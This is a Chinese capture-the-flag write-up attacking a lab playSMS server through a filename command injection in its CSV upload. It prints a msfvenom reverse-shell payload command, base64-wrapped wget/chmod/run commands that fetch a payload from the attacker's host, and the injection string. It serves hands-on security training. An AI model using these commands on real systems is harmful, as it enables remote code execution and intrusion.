CTF—攻防练习之HTTP—命令注入

主机:192.168.32.152  

靶机:192.168.32.167

首先nmap,nikto -host,dirb 探测
robots.txt目录下

在/nothing目录中,查看源码发现pass

CTF—攻防练习之HTTP—命令注入_第1张图片

在secure目录下发现一个zip文件,下载下来,发现密码freedom即可打开
然后发现mp3文件其实是text文本,cat打开

CTF—攻防练习之HTTP—命令注入_第2张图片

发现一段文字还有个url,打开url,用户:touhid,密码尝试出为diana
CTF—攻防练习之HTTP—命令注入_第3张图片

 

 进入了页面

CTF—攻防练习之HTTP—命令注入_第4张图片

然后我们就看一看当前cms有没有已知的可利用漏洞,searchsploit playSMS
CTF—攻防练习之HTTP—命令注入_第5张图片

该漏洞目录是  /usr/share/exploitdb/exploits/php/webapps/42003.txt cat下,cat下该漏洞查看该漏洞描述
CTF—攻防练习之HTTP—命令注入_第6张图片

大致意思就是说存在一个上传点,但文件名要改成另一种格式,就可执行和上传文件相关的代码
目录在app=main&inc=core_welcome,打开确实有上传点,上传csv文件的点
CTF—攻防练习之HTTP—命令注入_第7张图片

 

 用bp上传抓包改文件名测试下,确实存在命令注入CTF—攻防练习之HTTP—命令注入_第8张图片

那我们就可以制作并上传一个反弹shell
shell为: linux/x86/meterpreter/reverse_tcp
msfvenom -p生成

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 elf> /var/www/html/s
重定向到apache服务器,通过执行下载命令,再修改权限
再用msfconsole监听即可

首先开启apache服务器:
survice apache2 start     开启
survice apache2 status  查看状态

再利用命令注入漏洞上传,使用命令注入漏洞时,我们可以先用base64转码绕过防火墙
echo 'wget http://192.168.32.152/s -O /tmp/a' | base64
echo 'chmod 777 /tmp/a' | base64
echo '/tmp/a' | base64

再在bp 中用命令  "('XXXXXXXX')); dia();?>.php"
最终完成三个命令上传拿到反弹shell

你可能感兴趣的:(CTF—攻防练习之HTTP—命令注入)